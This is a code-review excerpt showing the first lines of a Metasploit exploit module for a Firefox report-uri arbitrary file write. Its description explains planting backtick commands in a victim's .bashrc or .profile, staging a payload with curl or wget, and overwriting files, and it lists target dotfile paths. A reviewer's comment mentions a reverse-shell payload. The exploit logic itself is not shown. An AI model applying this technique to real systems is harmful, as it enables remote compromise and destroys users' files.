modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # You have to guess the logged-in user's name.
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Firefox report-uri File Overwrite',
+      'Description' => %q{
+        This module abuses an arbitrary file write vulnerability in Firefox < 45.0
+        to plant a .bashrc (or similar) file on the victim, ultimately resulting in
+        a shell. The exploit causes a file to be written to the path of your choice
+        containing backticks ` that allow us to execute shell commands. A curl or
+        wget binary on the system is then used to stage a metasploit payload.
+
+        For this module to work, you must know or guess (up to a few hundred tries)
+        the username of the logged in user. Some good paths to try are:
+
+        /home/user/.profile,
+        /home/user/.bashrc,
+        /home/user/.zshrc,
+        /home/user/.bash_aliases,
+        /home/user/.login,
+        /var/root/.profile,
+        /var/root/.login
+
+        As a warning, this module is fairly destructive and will attempt to overwrite
+        any paths specified in FILES and eventually erase them. Use with caution.
+      },
+      'Author'         => [
+        'Nicolas Golubovic', # vuln discoverer
+        'evo'
+      ],
+      'License'     => MSF_LICENSE,
+      'Arch'           => [ARCH_CMD],
```

Comment:
It looks like on a recent update, you switched from a group of architectures to ARCH_CMD, which limited the payload selection dramatically, and specifically, it prevents the selection you specified in your testing script (linux/x64/shell_reverse_tcp).